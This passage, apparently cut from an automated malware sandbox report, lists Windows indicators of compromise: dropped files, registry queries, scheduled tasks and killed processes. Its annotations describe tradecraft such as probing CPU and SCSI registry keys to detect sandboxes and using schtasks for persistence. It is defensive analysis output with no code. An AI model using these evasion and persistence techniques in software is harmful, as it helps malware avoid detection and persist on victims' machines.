ultramediaburner.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\PROGRA~3\Jvgzbfh.tmp rundll32.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-361J5.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini ay5bW_VFzsOfZRDXJ5WpBM3j.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File created C:\Program Files (x86)\GameBox INC\ZHolaqubipae.exe Daldoula.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak WnyJD1JNbEGRSLlBiKgWSQPQ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe Setup.exe -
Drops file in Windows directory 21 IoCs
Processes:
msiexec.exechrome.exeMicrosoftEdge.exeMicrosoftEdge.exeWerFault.exedescription ioc process File opened for modification C:\Windows\Installer\MSIF14D.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI63BB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBAB8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBE72.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT chrome.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSID130.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f763eca.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI53DA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI586F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6756.tmp msiexec.exe File created C:\Windows\Installer\f763eca.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4D70.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5EA9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB5B6.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
gYQ2xLKgMc9lQ4OLbLxZeBiq.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gYQ2xLKgMc9lQ4OLbLxZeBiq.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gYQ2xLKgMc9lQ4OLbLxZeBiq.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI gYQ2xLKgMc9lQ4OLbLxZeBiq.exe -
Checks processor information in registry 2 TTPs 53 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RUNDLL32.EXERUNDLL32.EXEMicrosoftEdgeCP.exesvchost.exesvchost.exebuild2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MicrosoftEdgeCP.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision RUNDLL32.EXE -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7468 schtasks.exe 9200 schtasks.exe 1064 schtasks.exe 8128 schtasks.exe 5772 schtasks.exe 5860 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 6808 timeout.exe 8748 timeout.exe 7488 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
chrome.exechrome.exeMicrosoftEdgeCP.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1128 taskkill.exe 6760 taskkill.exe 5308 taskkill.exe 4528 taskkill.exe 4560 taskkill.exe 8500 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exebrowser_broker.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 17 IoCs
Processes:
svchost.exesvchost.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exechrome.exeE92.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K} E92.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K}\1 = "7216" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\7289246C77593EBF\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C\2 = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{6F7197A6-B789-4297-B8D9-7200AAB3CA09} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local 